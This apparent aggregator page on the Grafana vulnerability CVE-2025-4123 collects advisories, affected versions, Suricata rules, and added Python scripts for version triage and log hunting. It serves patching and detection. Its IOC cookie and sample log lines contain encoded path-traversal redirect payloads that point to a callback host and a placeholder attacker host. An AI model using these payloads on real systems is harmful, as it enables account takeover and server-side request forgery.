CVE-2025-4123
Published: 2025-05-22
Priority: P2 · 78 · Severity: medium · CVSS 3.1 base score 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
In-the-wild exploitation: yes (VulnCheck KEV)
EPSS: 97.81% (99.9th percentile)
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS through the `connect-src` directive.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | grafana_grafana | >= 0 < 0.0.0-20250521183405-c7a690348df7 | 0.0.0-20250521183405-c7a690348df7 |
| grafana | grafana | < 10.4.18 | 10.4.18 |
| grafana | grafana | (7 further rows whose ranges are not given in the source; see the OSV note below on versions that could not be mapped) | — |
| grafana | grafana | >= 10.4.18+security-01 < 10.4.19 | 10.4.19 |
| grafana | grafana | >= 11.2.0 < 11.2.9 | 11.2.9 |
| grafana | grafana | >= 11.2.9+security-01 < 11.2.10 | 11.2.10 |
| grafana | grafana | >= 11.3.0 < 11.3.6 | 11.3.6 |
| grafana | grafana | >= 11.3.6+security-01 < 11.3.7 | 11.3.7 |
| grafana | grafana | >= 11.4.0 < 11.4.4 | 11.4.4 |
| grafana | grafana | >= 11.4.4+security-01 < 11.4.5 | 11.4.5 |
| grafana | grafana | >= 11.5.0 < 11.5.4 | 11.5.4 |
| grafana | grafana | >= 11.5.4+security-01 < 11.5.5 | 11.5.5 |
| grafana | grafana | >= 11.6.0 < 11.6.1 | 11.6.1 |
| grafana | grafana | >= 11.6.1+security-01 < 11.6.2 | 11.6.2 |
| grafana | grafana | >= 12.0.0+security-01 < 12.0.1 | 12.0.1 |
| msrc | cbl2_podman_on_cbl_mariner_2.0 | — | — |

The msrc row comes from the Microsoft entry further down, which describes CVE-2022-4123 (a Buildah path-disclosure flaw), not CVE-2025-4123; it does not indicate that Podman on CBL-Mariner is affected by this Grafana issue.
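As an added example (not code from the page or from Grafana), the following Python script triages a version inventory against the machine-readable rows of the table above. Grafana's security re-releases carry a "+security-NN" suffix; a plain semver comparison discards build metadata, so 11.6.1+security-01 would be treated as equal to 11.6.1, which is exactly the distinction several rows depend on. The parser below ranks the suffix after the base release. Rows printed as "—" are not encoded, so versions outside the listed series are reported as "not covered by table" rather than guessed. Note also that the table lists 10.4.18 both as the fix for the first range and as the base of a further affected range (10.4.18+security-01 up to 10.4.19); the script encodes the rows as printed and leaves that reconciliation to the vendor advisory. Hostnames in the sample inventory are constructed.

```python
# Added example, not code from the page or from Grafana: triage an inventory
# of Grafana versions against the affected ranges printed in the table above.
import re

# Grafana security re-releases look like "11.6.1+security-01". Plain semver
# treats "+..." as build metadata and ignores it for ordering, so the suffix
# is parsed here as a fourth component that ranks after the base release.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\+security-(\d+))?$")


def parse_version(version: str) -> tuple:
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch, security = m.groups()
    return (int(major), int(minor), int(patch), int(security or 0))


# (lower bound inclusive or None, upper bound exclusive, fixed-in), copied from
# the machine-readable rows of the table. The rows printed as "—" are not
# encoded; versions they would cover are reported as "not covered by table".
AFFECTED_RANGES = [
    (None,                  "10.4.18", "10.4.18"),
    ("10.4.18+security-01", "10.4.19", "10.4.19"),
    ("11.2.0",              "11.2.9",  "11.2.9"),
    ("11.2.9+security-01",  "11.2.10", "11.2.10"),
    ("11.3.0",              "11.3.6",  "11.3.6"),
    ("11.3.6+security-01",  "11.3.7",  "11.3.7"),
    ("11.4.0",              "11.4.4",  "11.4.4"),
    ("11.4.4+security-01",  "11.4.5",  "11.4.5"),
    ("11.5.0",              "11.5.4",  "11.5.4"),
    ("11.5.4+security-01",  "11.5.5",  "11.5.5"),
    ("11.6.0",              "11.6.1",  "11.6.1"),
    ("11.6.1+security-01",  "11.6.2",  "11.6.2"),
    ("12.0.0+security-01",  "12.0.1",  "12.0.1"),
]

# Minor series the table describes at all (everything below 10.4.18 is
# already covered by the open-ended first range).
TABLE_MINORS = {(10, 4), (11, 2), (11, 3), (11, 4), (11, 5), (11, 6), (12, 0)}


def assess(version: str) -> tuple:
    """Return (verdict, fixed_in); verdict is 'affected',
    'not affected per table' or 'not covered by table'."""
    v = parse_version(version)
    for low, high, fixed in AFFECTED_RANGES:
        low_ok = low is None or parse_version(low) <= v
        if low_ok and v < parse_version(high):
            return ("affected", fixed)
    if v[:2] in TABLE_MINORS:
        return ("not affected per table", None)
    return ("not covered by table", None)


def triage(inventory: dict) -> list:
    """inventory maps host -> version string. Returns (host, version,
    verdict, fixed_in) rows with affected hosts first, for patch ordering."""
    rows = []
    for host, version in inventory.items():
        try:
            verdict, fixed = assess(version)
        except ValueError as exc:
            verdict, fixed = f"unparseable ({exc})", None
        rows.append((host, version, verdict, fixed))
    order = {"affected": 0, "not covered by table": 1, "not affected per table": 2}
    return sorted(rows, key=lambda r: order.get(r[2], 1))


if __name__ == "__main__":
    # Constructed inventory: hostnames and versions are illustrative only.
    sample = {
        "grafana-a.example.internal": "11.6.0",
        "grafana-b.example.internal": "11.6.1+security-01",
        "grafana-c.example.internal": "11.6.2",
        "grafana-d.example.internal": "11.0.0",
        "grafana-e.example.internal": "9.5.3",
    }
    for host, version, verdict, fixed in triage(sample):
        print(f"{host:28} {version:20} {verdict:24} {fixed or ''}")
```

Anything the script reports as "not covered by table" (11.0.x and 11.1.x, for instance) is not a clean bill of health; those series fall into the rows the source could not render, so they have to be checked against the vendor advisory by hand.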
Detection & IOCs (extracted from sources)

IOC (cookie): redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..

Snort/Suricata rule (ET sid 2063023):
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1;)

Detection guidance:
- Detect double-URL-encoded path traversal sequences targeting the /public/ or /render/public/ endpoints; look for %252f, %255C and %2F%5C patterns in the HTTP URI, which indicate client-side path traversal chained with the open redirect.
- Monitor HTTP 302 responses from Grafana whose Location header contains a backslash-prefixed external hostname (e.g. /\<external-host>/?/), the hallmark of a successful open redirect.
- Alert on a redirect_to cookie containing double-encoded path traversal and an external OAST/DNS callback domain; this indicates active exploitation or probing.
- For SSRF, correlate outbound DNS/HTTP requests from the Grafana server to unexpected external hosts with inbound requests to /render/public/ that contain traversal sequences; SSRF is confirmed when a response with content-type image/png is returned alongside an interactsh/DNS callback hit.
- Use the Shodan query `product:"Grafana"` or the FOFA query `app="Grafana"` to find exposed instances for asset inventory and patch prioritization.
- The ET "M2" Suricata rule (sid 2065930) targets the /a/<plugin>/explore URL pattern combined with path traversal in the raw URI: monitor GET requests to /a/ endpoints whose request line contains "/explore HTTP/" together with backslash-encoded traversal sequences.

Context and caveats:
- The default Grafana Content-Security-Policy blocks the XSS through the connect-src directive, but it does not prevent exploitation outright: CSP is enforced only by the victim's browser, so the open redirect and the SSRF chain remain exploitable.
- If anonymous access is enabled, the XSS requires no authentication at all, which substantially widens the exposed population.
- If the Grafana Image Renderer plugin is installed, the open redirect can be escalated to a full-read SSRF, giving access to internal services and cloud metadata endpoints.
- The plugin-loading feature required for the XSS is enabled by default, so most unpatched instances are exploitable without any configuration change.
- Exploitation requires user interaction (the victim must click a crafted link) and an active session at the time of the click; purely passive exploitation is not possible.
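The request, response and cookie patterns in the guidance above, implemented as an added example (Python; not code from the page, from Emerging Threats or from any other source listed here) and run over constructed log lines. The log format is an assumption: combined log format with the response Location header appended as a final quoted field, and evil.example.net stands in for an attacker host. The ET rules quoted on this page remain the reference signatures; this script is for hunting in existing web-server logs where no IDS was in line.

```python
# Added example, not code from the page or from any of its sources: the
# request, response and cookie checks listed above, applied to constructed
# log lines. Nothing here is an Emerging Threats signature; the ET rules
# quoted on this page remain the reference for IDS deployment.
import re
from urllib.parse import unquote


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Collapse nested percent-encoding (%25252f -> %252f -> %2f -> /).
    Bounded so a deliberately deep encoding cannot spin the scanner."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# Decoded request path: "/public/" (which also matches "/render/public/"),
# then one or more dot/slash traversal characters, then the backslash that
# makes the browser-side router read what follows as "//<host>".
TRAVERSAL_RE = re.compile(r"/public/[./]+\\")


def is_traversal_request(uri: str) -> bool:
    return TRAVERSAL_RE.search(fully_decode(uri)) is not None


def is_plugin_explore_variant(uri: str) -> bool:
    """Shape of the ET 'M2' rule: raw path under /a/ containing /explore,
    with the same traversal-plus-backslash sequence inside."""
    return uri.startswith("/a/") and "/explore" in uri and is_traversal_request(uri)


def is_open_redirect_location(location: str) -> bool:
    """A 302 Location of the form /\\<host>/... is resolved off-site by browsers."""
    return location.startswith("/\\")


def is_suspicious_redirect_cookie(cookie_header: str) -> bool:
    """redirect_to carrying an encoded /public/ traversal and a backslash."""
    m = re.search(r"(?:^|;\s*)redirect_to=([^;]+)", cookie_header)
    if not m:
        return False
    value = fully_decode(m.group(1))
    return "/public/" in value and "\\" in value


# Assumed log format: combined log format with the response Location header
# appended as a final quoted field ("-" when absent).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<location>[^"]*)"$'
)

# Constructed sample traffic, not a capture; evil.example.net is a placeholder.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2025:10:00:01 +0000] "GET /public/build/grafana.light.css HTTP/1.1" 200 5120 "-"
203.0.113.9 - - [01/Jun/2025:10:00:02 +0000] "GET /public/..%252f..%252f%255cevil.example.net%252f%253f%252f..%252f.. HTTP/1.1" 302 0 "/\\evil.example.net/?/../.."
203.0.113.9 - - [01/Jun/2025:10:00:03 +0000] "GET /render/public/..%252f%255cevil.example.net%252f%253f%252f..%252f.. HTTP/1.1" 302 0 "/\\evil.example.net/?/.."
203.0.113.9 - - [01/Jun/2025:10:00:04 +0000] "GET /a/plugin/public/..%252f..%252f%255cevil.example.net%252f..%252f../explore HTTP/1.1" 302 0 "/\\evil.example.net/../../explore"
203.0.113.11 - - [01/Jun/2025:10:00:05 +0000] "GET /login HTTP/1.1" 200 2048 "-"
"""


def scan_lines(lines) -> list:
    """Return [(line_number, [reason, ...]), ...] for lines worth an alert."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = []
        if is_plugin_explore_variant(m["uri"]):
            reasons.append("traversal on /a/<plugin>/explore route (ET M2 shape)")
        elif is_traversal_request(m["uri"]):
            reasons.append("double-encoded traversal under /public/")
        if m["status"] == "302" and is_open_redirect_location(m["location"]):
            reasons.append("302 to backslash-prefixed external host")
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan_lines(SAMPLE_LOG.splitlines()):
        print(number, "; ".join(reasons))
```

The decoder is bounded and the traversal test runs on the fully decoded path, so single-, double- and triple-encoded variants all reach the same regex; the cookie IOC above is effectively triple-encoded once the cookie value's own encoding is counted, and it is caught the same way.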
CVSS provenance
- nvd: v3.1, 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- osv: 6.1 MEDIUM
- vulncheck: 7.6 HIGH
- vendor_redhat: 7.6 HIGH
- vendor_msrc: 3.3 LOW (this score belongs to CVE-2022-4123, the Buildah flaw in the mis-associated Microsoft entry below, not to CVE-2025-4123)
OSV
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin in github.com/grafana/grafana
osv · 2025-05-27 · CVE-2025-4123
NOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.
(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)
The additional affected modules and versions are: github.com/grafana/grafana before v0.0.0-20250521183405-c7a690348df7.
GHSA
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
ghsa · 2025-05-22 · CVE-2025-4123 · HIGH · CWE-79
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF.
The default Content-Security-Policy (CSP) in Grafana will block the XSS through the `connect-src` directive.
OSV
CVE-2025-4123: A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect
osv · 2025-05-22 · CVSS 6.1 MEDIUM
(Description identical to the advisory text at the top of this page.)
OSV
Grafana Cross-Site-Scripting (XSS) via custom loaded frontend plugin
osv · 2025-05-22 · CVE-2025-4123 · HIGH
(Description identical to the advisory text at the top of this page.)
VulnCheck
Grafana Labs Grafana Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck · 2025 · CVSS 7.6 HIGH
(Description identical to the advisory text at the top of this page.)
Affected: Grafana Labs Grafana
Required Action: Apply remediations or mitigations per vendor instructions.
Red Hat
grafana: Cross-site Scripting (XSS) in Grafana via Custom Frontend Plugins and Open Redirect
vendor_redhat · 2025-05-15 · CVSS 7.6 HIGH · CWE-79
(Description identical to the advisory text at the top of this page.)
A flaw was found in Grafana's custom frontend plugin handling. This vulnerability allows an attacker to perform a cro
Microsoft
A flaw was found in Buildah. The local path and the lowest subdirectory may be disclosed due to incorrect absolute path traversal, resulting in an impact to confidentiality.
vendor_msrc · 2022-12-13 · CVSS 3.3 LOW · CWE-23 · CVE-2022-4123
This entry describes CVE-2022-4123 (a Buildah path-disclosure flaw), not CVE-2025-4123; it appears on this page apparently because the two identifiers share the same numeric suffix. Its score and its affected-product row in the table above should be disregarded when assessing Grafana.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mari
Suricata
ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2
suricata · 2025-11-26 · CVSS 7.6 HIGH
Rule (truncated in the source): alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Open Redirect (CVE-2025-4123) M2"; flow:established,to_server; http.request_line; content:"GET /a/"; content:"/explore HTTP/"; fast_pattern; http.uri.raw; content:"public"; pcre:"/^(?:\x2f|%(?:25)?2[fF])(?:(?:\x2e|%(?:25)?2[Ee]){1,2}(?:\x2f|%(?:25)?2[Ff]){1,})+(?:\x5c|%(?:25)?5[cC])/R"; reference:url,nightbloodz.github.io/grafana-CVE-2025-4123/; reference:cve,2025-4123; classtype:web-application-attack; sid:2065930; rev:1; metadata:affected_product Grafana, attack_target Server, tls_state TLSDecrypt, created_at 2025_11_26, cve CVE_2025_4123, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag
Suricata
ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)
suricata · 2025-06-17 · CVSS 7.6 HIGH
Rule (truncated in the source): alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Grafana Account Takeover via Path Traversal & Open Redirect (CVE-2025-4123)"; flow:established,to_server; http.uri; url_decode; content:"/public/"; fast_pattern; pcre:"/^(?:\x2e|\x2f|\x25(?:25)?2[eEfF])+(?:\x5c|\x25(?:25)?5[cC])/R"; reference:url,www.ox.security/confirmed-critical-the-grafana-ghost-exposes-36-of-public-facing-instances-to-malicious-account-takeover/; reference:cve,2025-4123; classtype:web-application-attack; sid:2063023; rev:1; metadata:affected_product Grafana, attack_target Server, created_at 2025_06_17, cve CVE_2025_4123, deployment Perimeter, deployment Internal, performance_impact Moderate, confidence Me
Exploit-DB
Grafana 11.6.0 - SSRF
exploitdb · 2026-04-06 · CVSS 7.6 HIGH
---
# Exploit Title: Grafana 11.6.0 - SSRF
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123
Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure
Nuclei
Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
nuclei · CVSS 6.1 MEDIUM
An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
Template (truncated in the source):
id: CVE-2025-4123
info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeov
Bleepingcomputer
Over 46,000 Grafana instances exposed to account takeover bug
blogs_bleepingcomputer · 2025-06-15 · CVSS 7.6 HIGH
By Bill Toulas
More than 46,000 internet-facing Grafana instances remain unpatched and exposed to a client-side open redirect vulnerability that allows executing a malicious plugin and account takeover.
The flaw is tracked as CVE-2025-4123 and impacts multiple versions of the open-source platform used for monitoring and visualizing infrastructure and application metrics.
The vulnerability was discovered by bug bounty hunter Alvaro Balada and was addressed in security updates that Grafana Labs released on May 21.
However, as of writing this, more than a third of all Grafana instances reachable over the public internet have not been patched, according to researchers at application security company OX Security, who refer to
Wiz
Crying Out Cloud Newsletter - June 2025 | Wiz
blogs_wiz · 2025-06-01 · CVSS 9.8 CRITICAL (score as tagged by the aggregator; it does not correspond to any CVE-2025-4123 score listed above, and the excerpt below covers the newsletter's Ivanti item)
Welcome back!
This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Here are our top picks of cloud security highlights!
## 🔍 Highlights
## Ivanti EPMM RCE Vulnerability Chain Exploited in the Wild
On May 13th, 2025, Ivanti disclosed that Endpoint Manager Mobile (EPMM) is affected by a vulnerability chain combining an authentication bypass (CVE-2025-4427) and a post-authentication remote code execution vulnerability (CVE-2025-4428). These flaws, which stem from unsafe use of Java Expression Language in error messages and misconfigured routing, can be exploited together to achieve unauthenticated RCE. Therefore, while neither of t
Greynoiseio
NoiseLetter December 2025
blogs_greynoiseio · CVSS 10.0 CRITICAL (score as tagged by the aggregator; the excerpt carried no CVE-specific content)
HackerOne
CVE‑2025‑4123 — Grafana Open Redirect → Stored XSS → SSRF (Full Read) at ██████
hackerone · 2026-01-12 · HIGH
## Summary
**CVE‑2025‑4123** is a high‑severity vulnerability in **Grafana OSS and Enterprise** that allows unauthenticated attackers to chain multiple flaws:
* **Open Redirect** via path traversal in the public redirect handler.
* **Stored XSS** through malicious plugin injection.
* **Full‑read SSRF** if the Grafana Image Renderer plugin is installed.
This can lead to **account takeover, data theft, and internal network compromise**.
---
## 3. Affected Products
* Grafana OSS & Enterprise **8.x through 12.x**
* **Not affected**: Grafana Cloud (managed service)
* **Vulnerable configurations**:
* Anonymous access enabled
* Image Renderer plugin installed
* Outbound egress to the internet is allowed
---